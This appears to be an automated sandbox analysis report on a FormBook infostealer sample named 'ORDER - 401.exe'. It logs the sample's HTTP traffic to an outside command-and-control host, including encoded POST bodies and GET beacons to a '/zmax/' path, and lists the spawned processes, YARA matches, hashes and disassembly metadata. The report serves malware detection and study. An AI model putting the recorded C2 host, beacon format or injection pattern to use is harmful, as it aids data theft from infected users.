                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                51192.168.2.55006281.2.196.1980
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:53:26.907990932 CET1801OUTPOST /zmax/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bagatowcannabis.cloud
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.bagatowcannabis.cloud
                                                                                Referer: http://www.bagatowcannabis.cloud/zmax/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 52 36 70 6b 4f 6d 55 4b 68 47 35 74 4f 55 51 56 4d 77 49 6a 37 69 72 6a 39 73 30 42 41 4c 31 35 43 4f 65 6d 76 50 6a 6b 5a 46 49 4b 31 76 77 71 75 70 45 78 43 2f 7a 35 43 56 6a 31 34 6c 38 2b 4a 38 52 66 49 6f 64 6e 5a 48 48 37 2b 4c 53 51 39 57 2b 6b 35 4f 49 53 72 4d 58 74 75 73 45 30 6d 54 54 67 47 53 53 48 6c 72 76 6a 56 53 52 4a 64 4e 42 37 79 72 54 37 44 35 42 52 39 6c 72 6d 54 72 74 4b 75 33 51 48 52 2f 61 49 6f 6d 54 59 50 4c 78 4e 61 6f 6a 46 54 4c 73 65 7a 34 41 4b 42 41 77 77 6a 2f 32 67 45 4c 2f 59 53 53 50 43 62 57 62 59 54 32 67 5a 52 31 4b 30 4b 75 57 54 61 4e 37 32 6e 4e 54 6c 55 46 44 37 43 77 75 6a 74 4e 35 56 4a 68 4a 6c 67 56 77 30 30 31 72 70 50 4c 32 43 4f 59 43 32 54 61 6e 66 72 75 59 61 4f 52 4e 48 69 31 6d 76 43 4a 50 37 35 6a 30 66 6f 33 69 4d 72 46 41 66 44 73 41 72 77 54 47 46 35 43 55 78 70 62 30 78 4f 57 67 30 48 42 6b 69 6d 4c 62 2b 54 4f 64 48 57 69 73 4e 50 69 77 6f 79 64 35 37 33 43 4f 49 61 4d 76 70 41 43 55 51 44 39 30 5a 4c 56 70 33 54 43 70 6e 37 [TRUNCATED]
                                                                                Data Ascii: NVK8=R6pkOmUKhG5tOUQVMwIj7irj9s0BAL15COemvPjkZFIK1vwqupExC/z5CVj14l8+J8RfIodnZHH7+LSQ9W+k5OISrMXtusE0mTTgGSSHlrvjVSRJdNB7yrT7D5BR9lrmTrtKu3QHR/aIomTYPLxNaojFTLsez4AKBAwwj/2gEL/YSSPCbWbYT2gZR1K0KuWTaN72nNTlUFD7CwujtN5VJhJlgVw001rpPL2COYC2TanfruYaORNHi1mvCJP75j0fo3iMrFAfDsArwTGF5CUxpb0xOWg0HBkimLb+TOdHWisNPiwoyd573COIaMvpACUQD90ZLVp3TCpn7ckO5sUJBe5ZLdReRrQ30uCPxaCGgbhffKr0WUCI11jcd1r5QkssHJZ873zAKwKM6VtoVFvOBTF6+lE3Fn8M6In37b+emnFBSJBGxvzzO38z81uh1GikoptxIsN0aL8fHBCizWiKo55r7pVLxS96c+QNCPazeaQRP0zRKXMbR2rfNCcR7BhtWVGO94WIpUyyk6Szf0RuEgYH8ZtM3kkKOWFmkN8iolzsgwlT9P6ByGGUVXUVjIT/a+SQntbBX+TAregxSVdhM5Z9Vbpv7x7rx6PF3yKhHivhSCtwJhZa/QXHPZzg595/QqMgdNDdNDqzo7XOnTZE50wU/hXs1dDTWsuifrJNkQ0pFLPziSbVgTQE75hcA4Iu8M5u13PAsTILcXtgFtc0VQarKk0waSyvsmeOQS4Bc0ExRkYx0agFDGucbQtUKxpo0G4jKyn8Z/POXfjIEv6tlgYecmQIpwM/lGiLZcj2iVgSuXxL09o1H2qA067LNvcgC59i2luewDlWWcHS4DAgUeCQzzBQPF8/ISR51MM7ZB7zt+8GX6mcTOVDMhZT8ZutcIt7nv0d9Kzhtz5JgMvmNCvlQto5DThBRhs5dZJCtl0CsHEHtk7KDQt4IulHxzn2WRLvNAr3AuQp7Dqz0Ov6Dvu5RxKvICY0HMu+QgIokg/suVP [TRUNCATED]
                                                                                Dec 14, 2024 13:53:28.184179068 CET355INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:53:27 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                52192.168.2.55006381.2.196.1980
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:53:29.578210115 CET490OUTGET /zmax/?NVK8=c4BENRMdvExsGH0SBTpe30rq6PgBdYYINfe+1MbqTEgo+clVhexpavqEdWzY6VY2Bf1XKclHU3L+/KXqkFrj6MgG392Vu6gwiCPkGxCor7quDyVMbfsrwMj3Ae4U3nGzRw==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.bagatowcannabis.cloud
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:53:30.855499983 CET691INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:53:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 548
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:07:49:18
                                                                                Start date:14/12/2024
                                                                                Path:C:\Users\user\Desktop\ORDER - 401.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\ORDER - 401.exe"
                                                                                Imagebase:0x200000
                                                                                File size:836'608 bytes
                                                                                MD5 hash:0B1DCCAEE94A61586E90E0A62AB20100
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:07:49:26
                                                                                Start date:14/12/2024
                                                                                Path:C:\Users\user\Desktop\ORDER - 401.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\ORDER - 401.exe"
                                                                                Imagebase:0x3b0000
                                                                                File size:836'608 bytes
                                                                                MD5 hash:0B1DCCAEE94A61586E90E0A62AB20100
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:07:49:26
                                                                                Start date:14/12/2024
                                                                                Path:C:\Users\user\Desktop\ORDER - 401.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\ORDER - 401.exe"
                                                                                Imagebase:0xa0000
                                                                                File size:836'608 bytes
                                                                                MD5 hash:0B1DCCAEE94A61586E90E0A62AB20100
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:07:49:26
                                                                                Start date:14/12/2024
                                                                                Path:C:\Users\user\Desktop\ORDER - 401.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\ORDER - 401.exe"
                                                                                Imagebase:0x460000
                                                                                File size:836'608 bytes
                                                                                MD5 hash:0B1DCCAEE94A61586E90E0A62AB20100
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2477699059.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2479332677.0000000001330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:7
                                                                                Start time:07:49:37
                                                                                Start date:14/12/2024
                                                                                Path:C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe"
                                                                                Imagebase:0xca0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:8
                                                                                Start time:07:49:39
                                                                                Start date:14/12/2024
                                                                                Path:C:\Windows\SysWOW64\ieUnatt.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\ieUnatt.exe"
                                                                                Imagebase:0x4c0000
                                                                                File size:122'880 bytes
                                                                                MD5 hash:4E9919DF2EF531B389ABAEFD35AD546E
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4677196971.0000000004120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4677244560.0000000004170000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:10
                                                                                Start time:07:49:52
                                                                                Start date:14/12/2024
                                                                                Path:C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe"
                                                                                Imagebase:0xca0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4679125210.0000000005500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:11
                                                                                Start time:07:50:04
                                                                                Start date:14/12/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff79f9e0000
                                                                                File size:676'768 bytes
                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:9.8%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:62
                                                                                  Total number of Limit Nodes:7
                                                                                  execution_graph 27973 8cd01c 27974 8cd034 27973->27974 27975 8cd08e 27974->27975 27976 4b6112c CallWindowProcW 27974->27976 27978 4b62c09 27974->27978 27976->27975 27979 4b62c45 27978->27979 27981 4b62c69 27979->27981 27982 4b61254 CallWindowProcW 27979->27982 27981->27981 27982->27981 27948 4b642b0 27949 4b64302 27948->27949 27950 4b643ac 27948->27950 27951 4b6435a CallWindowProcW 27949->27951 27953 4b64309 27949->27953 27954 4b6112c 27950->27954 27951->27953 27955 4b61137 27954->27955 27957 4b62c69 27955->27957 27958 4b61254 CallWindowProcW 27955->27958 27957->27957 27958->27957 27983 74e0f58 27984 74e10e3 27983->27984 27985 74e0f7e 27983->27985 27985->27984 27988 74e11d8 PostMessageW 27985->27988 27990 74e11d1 27985->27990 27989 74e1244 27988->27989 27989->27985 27991 74e11d8 PostMessageW 27990->27991 27992 74e1244 27991->27992 27992->27985 27993 23f4668 27994 23f4672 27993->27994 27996 23f4758 27993->27996 27997 23f477d 27996->27997 28001 23f4868 27997->28001 28005 23f4859 27997->28005 28002 23f488f 28001->28002 28003 23f496c 28002->28003 28009 23f4514 28002->28009 28003->28003 28007 23f488f 28005->28007 28006 23f496c 28006->28006 28007->28006 28008 23f4514 CreateActCtxA 28007->28008 28008->28006 28010 23f58f8 CreateActCtxA 28009->28010 28012 23f59bb 28010->28012 27959 23fafb0 27960 23fafbf 27959->27960 27963 23fb0a8 27959->27963 27968 23fb098 27959->27968 27964 23fb0dc 27963->27964 27965 23fb0b9 27963->27965 27964->27960 27965->27964 27966 23fb2e0 GetModuleHandleW 27965->27966 27967 23fb30d 27966->27967 27967->27960 27969 23fb0dc 27968->27969 27970 23fb0b9 27968->27970 27969->27960 27970->27969 27971 23fb2e0 GetModuleHandleW 27970->27971 27972 23fb30d 27971->27972 27972->27960 28013 23fd340 28014 23fd386 28013->28014 28018 23fd50f 28014->28018 28021 23fd520 28014->28021 28015 23fd473 28019 23fd54e 28018->28019 28024 23fd0f8 28018->28024 28019->28015 28022 23fd0f8 DuplicateHandle 28021->28022 28023 23fd54e 28022->28023 28023->28015 28025 23fd588 DuplicateHandle 28024->28025 28026 23fd61e 28025->28026 28026->28019

                                                                                  Executed Functions

                                                                                  Function 04B67368 Relevance: 7.4, Strings: 5, Instructions: 1172COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 294 4b67368-4b6749b call 4b66de0 * 2 call 4b66df0 * 2 call 4b66e00 call 4b66df0 * 2 588 4b6749e call 4b69c30 294->588 589 4b6749e call 4b69c2c 294->589 328 4b674a1-4b674e8 call 4b66e10 592 4b674eb call 4b6ddb0 328->592 593 4b674eb call 4b6dda0 328->593 333 4b674ee-4b67695 call 4b66e20 call 4b66e30 call 4b66e40 call 4b66e50 356 4b67697-4b6769d 333->356 357 4b676ad-4b676dd 333->357 358 4b676a1-4b676a3 356->358 359 4b6769f 356->359 363 4b676e6-4b676ea 357->363 364 4b676df-4b676e4 357->364 358->357 359->357 365 4b68515-4b68539 363->365 366 4b676f0-4b676f3 363->366 367 4b676f6-4b67db4 call 4b66e10 call 4b66e20 call 4b66e30 call 4b66e40 call 4b66e50 call 4b66e10 call 4b66e20 call 4b66e30 call 4b66e40 call 4b66e50 call 4b66e60 call 4b66e70 call 4b66e10 call 4b66e20 call 4b66e30 call 4b66e40 call 4b66e50 call 4b66e60 call 4b66e70 call 4b66e80 call 4b66e90 call 4b66ea0 * 6 364->367 590 4b6853e call 23f8609 365->590 591 4b6853e call 23f5d44 365->591 366->367 594 4b67db7 call 23fff10 367->594 595 4b67db7 call 23fff00 367->595 372 4b68543-4b68603 call 4b66f68 call 4b66f78 473 4b67dba-4b68506 call 4b66e20 call 4b66e30 call 4b66eb0 call 4b66ec0 * 6 call 4b66e40 call 4b66e50 call 4b66e10 call 4b66e20 call 4b66e30 call 4b66e40 call 4b66e50 call 4b66e60 call 4b66e70 call 4b66e10 call 4b66e20 call 4b66e30 call 4b66e40 call 4b66e50 call 4b66e60 call 4b66e70 call 4b66ed0 call 4b66ee0 call 4b66ef0 call 4b66f00 call 4b66f10 call 4b66f20 call 4b66f30 call 4b66e30 call 4b66f40 call 4b66f58 587 4b6850d-4b68514 473->587 588->328 589->328 590->372 591->372 592->333 593->333 594->473 595->473
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2295332344.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4b60000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: :$@$@$@$l
                                                                                  • API String ID: 0-1254695202
                                                                                  • Opcode ID: 30d844b4a1f51f4375ff7465f1e68bb40c8a9f5474c6cb3b8939a16bd1fc9d4a
                                                                                  • Instruction ID: 0804555794cfe0f199cb3f34f1205345bb0d9028ff89595574aafb027ce4dffd
                                                                                  • Opcode Fuzzy Hash: 30d844b4a1f51f4375ff7465f1e68bb40c8a9f5474c6cb3b8939a16bd1fc9d4a
                                                                                  • Instruction Fuzzy Hash: 36B21D30A10704CFD715EF78C854BAAB7B2FF89304F508999D54AAB360DB75A986CF81
                                                                                  Function 04B67358 Relevance: 7.3, Strings: 5, Instructions: 1095COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 596 4b67358-4b673ab 600 4b673b5-4b673b9 call 4b66de0 596->600 602 4b673be-4b67423 call 4b66de0 call 4b66df0 * 2 600->602 616 4b6742d-4b67431 call 4b66e00 602->616 618 4b67436-4b6748a call 4b66df0 * 2 616->618 629 4b67491-4b6749b 618->629 890 4b6749e call 4b69c30 629->890 891 4b6749e call 4b69c2c 629->891 630 4b674a1-4b674b4 632 4b674be-4b674e8 call 4b66e10 630->632 894 4b674eb call 4b6ddb0 632->894 895 4b674eb call 4b6dda0 632->895 635 4b674ee-4b67523 call 4b66e20 637 4b67528-4b675eb call 4b66e30 call 4b66e40 call 4b66e50 635->637 646 4b675f0 637->646 647 4b675fa-4b67625 646->647 651 4b6762c-4b6763e 647->651 652 4b67646-4b67671 651->652 656 4b67678-4b6768b 652->656 657 4b67693-4b67695 656->657 658 4b67697-4b6769d 657->658 659 4b676ad-4b676b6 657->659 660 4b676a1-4b676a3 658->660 661 4b6769f 658->661 662 4b676bd-4b676c0 659->662 660->659 661->659 663 4b676cc-4b676dd 662->663 665 4b676e6-4b676ea 663->665 666 4b676df-4b676e4 663->666 667 4b68515-4b6852e 665->667 668 4b676f0-4b676f3 665->668 669 4b676f6-4b67cbd call 4b66e10 call 4b66e20 call 4b66e30 call 4b66e40 call 4b66e50 call 4b66e10 call 4b66e20 call 4b66e30 call 4b66e40 call 4b66e50 call 4b66e60 call 4b66e70 call 4b66e10 call 4b66e20 call 4b66e30 call 4b66e40 call 4b66e50 call 4b66e60 call 4b66e70 call 4b66e80 call 4b66e90 call 4b66ea0 666->669 672 4b68530-4b68539 667->672 668->669 758 4b67cc2-4b67cd8 669->758 892 4b6853e call 23f8609 672->892 893 4b6853e call 23f5d44 672->893 674 4b68543-4b68603 call 4b66f68 call 4b66f78 759 4b67cde-4b67da1 call 4b66ea0 * 5 758->759 774 4b67da7-4b67db4 759->774 896 4b67db7 call 23fff10 774->896 897 4b67db7 call 23fff00 774->897 775 4b67dba-4b68435 call 4b66e20 call 4b66e30 call 4b66eb0 call 4b66ec0 * 6 call 4b66e40 call 4b66e50 call 4b66e10 call 4b66e20 call 4b66e30 call 4b66e40 call 4b66e50 call 4b66e60 call 4b66e70 call 4b66e10 call 4b66e20 call 4b66e30 call 4b66e40 call 4b66e50 call 4b66e60 call 4b66e70 call 4b66ed0 call 4b66ee0 call 4b66ef0 call 4b66f00 871 4b6843b-4b68442 call 4b66f10 775->871 873 4b68447-4b684e3 call 4b66f20 call 4b66f30 call 4b66e30 call 4b66f40 871->873 885 4b684e8-4b68506 call 4b66f58 873->885 889 4b6850d-4b68514 885->889 890->630 891->630 892->674 893->674 894->635 895->635 896->775 897->775
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2295332344.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4b60000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: :$@$@$@$l
                                                                                  • API String ID: 0-1254695202
                                                                                  • Opcode ID: 1f3a79d054fd5c9ecef2351c61ada6bca0157c1732185746e866a6c20835f843
                                                                                  • Instruction ID: e8048a8e2c543d8e8fc0e756ffca285369f8fb2a762db9d4d37fe66edc59b6e8
                                                                                  • Opcode Fuzzy Hash: 1f3a79d054fd5c9ecef2351c61ada6bca0157c1732185746e866a6c20835f843
                                                                                  • Instruction Fuzzy Hash: 40B21B30A10705CFD715EF38C854BAAB7B2FF89304F518999D54AAB360DB75A986CF80
                                                                                  Function 074E1A28 Relevance: .3, Instructions: 335COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2297285517.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74e0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a50a6d180f088419f9ec2116bf31e4d14687c2028d5e55fd274604365fbaa029
                                                                                  • Instruction ID: 23bde647599044e7a98fc6dd120ce28db7527b1814b4aa37bdef1213952c946b
                                                                                  • Opcode Fuzzy Hash: a50a6d180f088419f9ec2116bf31e4d14687c2028d5e55fd274604365fbaa029
                                                                                  • Instruction Fuzzy Hash: 53C1AAB17006098FDB29DB75C460BAFB7EAAF89301F54446ED24ACB390DB35E902CB51
                                                                                  Function 023FB0A8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1120 23fb0a8-23fb0b7 1121 23fb0b9-23fb0c6 call 23fad38 1120->1121 1122 23fb0e3-23fb0e7 1120->1122 1129 23fb0dc 1121->1129 1130 23fb0c8 1121->1130 1124 23fb0fb-23fb13c 1122->1124 1125 23fb0e9-23fb0f3 1122->1125 1131 23fb13e-23fb146 1124->1131 1132 23fb149-23fb157 1124->1132 1125->1124 1129->1122 1176 23fb0ce call 23fb330 1130->1176 1177 23fb0ce call 23fb340 1130->1177 1131->1132 1133 23fb17b-23fb17d 1132->1133 1134 23fb159-23fb15e 1132->1134 1139 23fb180-23fb187 1133->1139 1136 23fb169 1134->1136 1137 23fb160-23fb167 call 23fad44 1134->1137 1135 23fb0d4-23fb0d6 1135->1129 1138 23fb218-23fb2d8 1135->1138 1143 23fb16b-23fb179 1136->1143 1137->1143 1171 23fb2da-23fb2dd 1138->1171 1172 23fb2e0-23fb30b GetModuleHandleW 1138->1172 1140 23fb189-23fb191 1139->1140 1141 23fb194-23fb19b 1139->1141 1140->1141 1144 23fb19d-23fb1a5 1141->1144 1145 23fb1a8-23fb1b1 call 23fad54 1141->1145 1143->1139 1144->1145 1151 23fb1be-23fb1c3 1145->1151 1152 23fb1b3-23fb1bb 1145->1152 1153 23fb1c5-23fb1cc 1151->1153 1154 23fb1e1-23fb1ee 1151->1154 1152->1151 1153->1154 1156 23fb1ce-23fb1de call 23fad64 call 23fad74 1153->1156 1160 23fb211-23fb217 1154->1160 1161 23fb1f0-23fb20e 1154->1161 1156->1154 1161->1160 1171->1172 1173 23fb30d-23fb313 1172->1173 1174 23fb314-23fb328 1172->1174 1173->1174 1176->1135 1177->1135
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 023FB2FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2292712886.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_23f0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
